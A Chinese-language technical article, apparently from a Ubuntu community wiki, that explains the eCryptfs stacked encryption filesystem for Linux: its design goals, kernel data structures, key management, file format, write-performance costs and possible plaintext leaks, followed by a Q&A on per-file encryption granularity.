    为了评估一个加密解决方案的可行性,企业往往要考虑诸多因素,例如员工的学习曲线、增量备份是否受到影响、密钥丢失的话如何防止信息泄漏或如何恢复信息、转换及使用成本、潜在的风险等等。eCryptfs 在设计之初,充分考虑企业用户的如下需求:

    • 易于部署。eCryptfs 完全不需要对 Linux Kernel 的其它组件做任何修改,可以作为一个独立的内核模块进行部署。同时,eCryptfs 也不需要额外的前期准备和转换过程。
    • 用户能够自由选择下层文件系统来存放加密文件。由于不修改 VFS 层,eCryptfs 通过挂载(mount)到一个已存在的目录之上的方式实现堆叠的功能。对 eCryptfs 挂载点中文件的访问首先被重定向到 eCryptfs 内核文件系统模块中。
    • 易于使用。每次使用 eCryptfs 前,用户只需执行 mount 命令,随后 eCryptfs自动完成相关的密钥产生/读取、文件的动态加密/解密和元数据保存等工作。
    • 充分利用已有的成熟安全技术。例如,eCryptfs 对于加密文件采用 OpenPGP 的文件格式、通过 Kernel Crypto API使用内核实现的对称密钥加密算法和散列算法等。
    • 增强安全性。eCryptfs 的安全性最终完全依赖于解密 FEK 时所需的口令或私钥。通过利用 TPM 硬件(TPM可以产生公钥/私钥对,硬件直接执行加密/解密操作,而且私钥无法从硬件芯片中获得),eCryptfs 最大程度上保证私钥不被泄漏。
    • 支持增量备份。eCryptfs 将元数据和密文保存在同一个文件中,从而完美的支持增量备份及文件迁移。
    • 密钥托管。用户可以预先指定恢复帐号,万一遗失加密 FEK 的口令/私钥,也可以通过恢复帐号重新获得文件的明文;但是如果未指定恢复帐号,即使系统管理员也无法恢复文件内容。
    • 丰富的配置策略。当应用程序在 eCryptfs 的挂载点目录中创建新文件的时候,eCryptfs 必须做出许多决定,比如新文件是否加密、使用何种算法、FEK 长度、是否使用 TPM 等等。eCryptfs 支持与 Apache 类似的策略文件,用户可以根据具体的应用程序、目录进行详细的配置。

    [编辑] eCryptfs 的架构

    图 2. eCryptfs 加密文件系统的架构image002.jpg

    eCryptfs Layer 是一个比较完备的内核文件系统模块,但是没有实现在物理介质上存取数据的功能。在 eCryptfs Layer自己的数据结构中,加入了指向下层文件系统数据结构的指针,通过这些指针,eCryptfs就可以存取加密文件。清单 2 列出几种主要的数据结构:

    清单 2. eCryptfs Layer 主要数据结构

    static struct file_system_type ecryptfs_fs_type = {
    	.owner = THIS_MODULE,
    	.name = "ecryptfs",
    	.get_sb = ecryptfs_get_sb,
    	.kill_sb = ecryptfs_kill_block_super,
     	.fs_flags = 0
    } ;
    
    struct ecryptfs_sb_info {
    	struct super_block *wsi_sb;
    	struct ecryptfs_mount_crypt_stat mount_crypt_stat;
    };
    
    struct ecryptfs_inode_info {
    	struct inode vfs_inode;
    	struct inode *wii_inode;
    	struct file *lower_file; /* wii_inode, lower_file 指向下层文件系统对应的数据结构 */
    	struct mutex lower_file_mutex;
    	struct ecryptfs_crypt_stat crypt_stat;
    };
    
    struct ecryptfs_dentry_info {
    	struct path lower_path; /* 下层文件系统的 dentry */
    	struct ecryptfs_crypt_stat *crypt_stat;
    };
    
    struct ecryptfs_file_info {
    	struct file *wfi_file;
    	struct ecryptfs_crypt_stat *crypt_stat;
    };
    
    
    
    

    Keystore 和用户态的 eCryptfs Daemon 进程一起负责密钥管理的工作。eCryptfs Layer 首次打开一个文件时,通过下层文件系统读取该文件的头部元数据,交与 Keystore 模块进行 EFEK(加密后的 FEK)的解密。前面已经提及,因为允许多人共享加密文件,头部元数据中可以有一串 EFEK。EFEK 和相应的公钥算法/口令的描述构成一个鉴别标识符,由 ecryptfs_auth_tok 结构表示。Keystore 依次解析加密文件的每一个 ecryptfs_auth_tok 结构:首先在所有进程的密钥链(key ring)中查看是否有相对应的私钥/口令,如果没有找到,Keystore 则发一个消息给 eCryptfs Daemon,由它提示用户输入口令或导入私钥。第一个被解析成功的 ecryptfs_auth_tok 结构用于解密 FEK。如果 EFEK 是用公钥加密算法加密的,因为目前 Kernel Crypto API 并不支持公钥加密算法,Keystore 必须把 ecryptfs_auth_tok 结构发给 eCryptfs Daemon,由它调用 Key Module API 来使用 TPM 或 OpenSSL库解密 FEK。解密后的 FEK 以及加密文件内容所用的对称密钥算法的描述信息存放在 ecryptfs_inode_info 结构的 crypt_stat 成员中。eCryptfs Layer 创建一个新文件时,Keystore 利用内核提供的随机函数创建一个 FEK;新文件关闭时,Keystore 和 eCryptfs Daemon 合作为每个授权用户创建相应 EFEK,一齐存放在加密文件的头部元数据中。

    eCryptfs 采用 OpenPGP 的文件格式存放加密文件,详情参阅 RFC 2440 规范[4]。我们知道,对称密钥加密算法以块为单位进行加密/解密,例如 AES 算法中的块大小为 128 位。因此 eCryptfs 将加密文件分成多个逻辑块,称为 extent。当读入一个 extent 中的任何部分的密文时,整个 extent 被读入 Page Cache,通过 Kernel Crypto API 被解密;当 extent 中的任何部分的明文数据被写回磁盘时,需要加密并写回整个 extent(参见图 5[5])。extent 的大小是可调的,但是不会大于物理页的尺寸。当前的版本中的 extent 默认值等于物理页大小,因此在 IA32 体系结构下就是 4096 字节。加密文件的头部存放元数据,包括元数据长度、标志位以及 EFEK 链,目前元数据的最小长度为 8192 字节。

    图 3. eCryptfs 加密/解密操作流程图image003.jpg

    [编辑] eCryptfs 不足之处在于

    写操作性能比较差。笔者用 iozone 测试了 eCryptfs 的性能,发现读操作的开销不算太大,最多降低 29%,有些小文件测试项目反而性能更好;对于写操作,所有测试项目的结果都很差,普遍下降 16 倍左右。这是因为 Page Cache 里面只存放明文,因此首次数据的读取需要解密操作,后续的读操作没有开销;而每一次写 x 字节的数据,就会涉及 ((x – 1) / extent_size + 1) * extent_size 字节的加密操作,因此开销比较大。

    有两种情况可能造成信息泄漏:a. 当系统内存不足时,Page Cache 中的加密文件的明文页可能会被交换到 swap 区,目前的解决方法是用 dm-crypt 加密 swap 区。b. 应用程序也有可能在读取加密文件后,将其中某些内容以临时文件的方式写入未挂载 eCryptfs 的目录中(比如直接写到 /tmp 中),解决方案是配置应用程序或修改其实现。eCryptfs 实现的安全性完全依赖于操作系统自身的安全。如果 Linux Kernel 被攻陷,那么黑客可以轻而易举地获得文件的明文,FEK 等重要信息。

    [编辑] 问与答

    联系我:一般还是使用站内短信通知比较快。 http://forum.ubuntu.org.cn/ucp.php?i=pm&mode=compose&u=171468

    [编辑] No.1

    HI,cat650:

    我看了你关于ecryptfs使用详解一文,对于文件加密粒度方面有所疑问。

    支持文件粒度的加密,也就是说,用户可以选择对哪些文件或目录加密。而且,应用程序不用关心文件是否被加密,可以完全透明地访问加密文件。
    对单个加密文件更改密钥和加密算法比较容易。
    不同的文件可以使用不同的加密算法和密钥,增大了破解的难度。
    只有加密文件才需要特殊的加密/解密处理,普通文件的存取没有额外开销。
    

    答:

    在linux下 mount 命令只能挂载于目录上。但不影响单个文件的加密工作。

    在例子中你应该看到,假设有一个文件夹text被加密(使用加密方法a,加密长度a,密码a;挂载于新建文件夹text-a 下),我们放入ta、tb文件。

    我们对text文件夹进行再次加密挂载(使用加密方法b,加密长度b,密码b;挂载于新建文件夹text-b下),仅操作其中一个文件(新建文件tx,并存入新记录)。

    此时我们再看text文件夹,ta、tb使用的是加密方法a,加密长度a,密码a;tx使用加密方法b,加密长度b,密码b。也就是说——选择对哪些文件或目录(目录操作类似)加密。做到文件粒度支持。

    如果要更改tb文件的加密方式也很简单(上述条件不变的情况下):新建加密挂载(使用加密方法c,加密长度c,密码c;挂载于新建文件夹text-c下)。把text-a下的tb文件移动到text-c下。密码更改完成。——对单个加密文件更改密钥和加密算法比较容易。

    此时ta、tb、tc使用的是完全不同的 加密方法,加密长度,密码——不同的文件可以使用不同的加密算法和密钥,增大了破解的难度。

     支持文件粒度的加密,也就是说,用户可以选择对哪些文件或目录加密。而且,应用程序不用关心文件是否被加密,可以完全透明地访问加密文件。——这个问题解答了吧。
    对单个加密文件更改密钥和加密算法比较容易。 
    不同的文件可以使用不同的加密算法和密钥,增大了破解的难度。 
    只有加密文件才需要特殊的加密/解密处理,普通文件的存取没有额外开销。——不进行加密挂载,就是它的实现。
    

    问题明白了吗?其它特性是因为这个加密层是存在于内存上(或虚拟内存内)。


    展开全文
  • eCryptFS(Enterprise Cryptographic Filesystem)可翻译为企业文件加密系统,是Linux系统中的文件加密系统,能够对文件或目录进行加密,且加密级别高,安全性强于一般软件。 安装eCryptfs sudo apt-get install ...
  • 企业加密文件系统 eCryptfs 详解近年来,保护个人敏感数据成为人们关注的热点问题,使用加密技术成为一种比较成功的保护方法。eCryptfs 是一个功能强大的企业加密文件系统,通过堆叠在其它文件系统之上(如 Ext2...
  • shell—系统文件加密

    2021-01-07 07:18:16
    shell—系统文件加密1. 建立初始指纹库和文件库step1 建立测试数据step2 建立初始的文件指纹库step3 建立初始文件库2. 监测文件内容和文件数量的变化step1 监测文件内容的变化step2 监测文件数量的变化3. 开发脚本 ...
  • eCryptfs加密文件系统,通过堆叠在其它文件系统之上(如 Ext2, Ext3, Ext3,ReiserFS, JFS 等),为应用程序提供透明、动态、高效和安全的加密功能。 加密文件系统通过将加密服务集成到文件系统这一层面来解决...
  • 文件加密系统

    2008-12-18 16:31:00
    上海鸿智安科——随着科学技术的日新月异,信息化已经渗透到企业日常运作的每个环节,“无纸化”办公已成为现代企业的发展趋势。信息化流转取代人力交接确实大大提高了企业的工作效率,但,也不知不觉使企业深陷另一...
  • 透明加密技术是近年来针对企业文件保密需求应运而生的一种文件加密技术。所谓透明,是指对使用者来说是未知的。当使用者在打开或编辑指定文件时,系统将自动对未加密的文件进行加密,对已加密的文件自动解密。文件在...
  • 企业文件图纸透明加密系统,旨在对企业中重要的图纸、财务数据、文档数据提供有效的保护,在技术上采用驱动级强制性透明加解密系统。对企业中涉密的重要的图纸、财务数据、文档数据进行强制性自动加解密,使加密后的...
  • 九安文件外发保镖(企业文件加密软件)又名九安文档外发防扩散软件,具备文件加密和密文阅读的功能,它可以对外发的文件进行高强度加密,在对方PC上双击打开密文后,显示和阅读习惯不变,密文打开后,系统进入安全封闭...
  • eCryptfs Instructions load ecryptfs kernel module 在安装完eCryptfs后需要加载eCryptfs...eCryptfs-mount-private(为非root用户设置一个私人的加密挂载点,更多详情man ecryptfs-mount-private) ini
  • 为了保护企业敏感数据不被泄漏,对主流的文件加密系统进行了深入的研究,结合私有云系统的整体架构,将聚合签名的身份认证引入到私有云,提出了一种基于聚合签名认证的eCryptfs私有云加密系统解决方案,经过分析拥有...
  • 文件加密对于企业来说主要是用于保护信息数据的,其工作原理其实是将原有的信息数据做了特殊算法的...现在的文件加密方法比较多,有点是利用系统的漏洞来进行加密,有的则是通过系统驱动加密,还有的就利用脚本进行文.
  • shell 系统文件加密

    2020-02-17 21:32:55
    监控web站点目录(/var/html/www)下的所有文件是否被恶意篡改(文件内容被更改 文件内容被改动了会有如下特征 1.大小可能会变化 2.修改时间会变化 ...第一步:在企业网站发布代码之后,即对所有网站数据建立...
  • 在科技时代飞速发展的今天,数据安全问题日益严重,有很多企业对数据安全的不重视,导致企业数据无意间泄密。由于大量机密数据均以电子文档的...如何针对文档加密、设计图纸加密甚至是电脑文件加密,在众多的解决...
  • 企业加密文件系统 eCryptfs 具体解释: http://www.ibm.com/developerworks/cn/linux/l-cn-ecryptfs/index.html 版权声明:本文博主原创文章,博客,未经同意不得转载。
  • 加密文件系统

    2015-12-12 13:43:00
    2019独角兽企业重金招聘Python工程师标准>>> ...
  • 易控王文档加密软件是一款功能强大、安全稳定的企业文件加密系统,加密办公文档、设计图纸、研发代码等,业内领先的双缓冲Windows底层文件驱动过滤技术,对企业中涉密的重要的图纸、财务数据、文档数据进行强制性...
  • 赛虎信息科技_天锐绿盾文件加密系统是一套从源头上保障数据安全和使用安全的软件系统。
  • shell---系统文件加密

    2020-02-16 16:27:38
    shell—系统文件加密 监控web站点目录下的所有文件是否被恶意篡改(文件内容被更改) 1.建立初始指纹库和文件库 在企业网站发布代码之后,即对所有网站数据建立初始指纹库和文件库,没有基础的指纹库,无法进行入侵...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 690
精华内容 276
关键字:

企业文件加密系统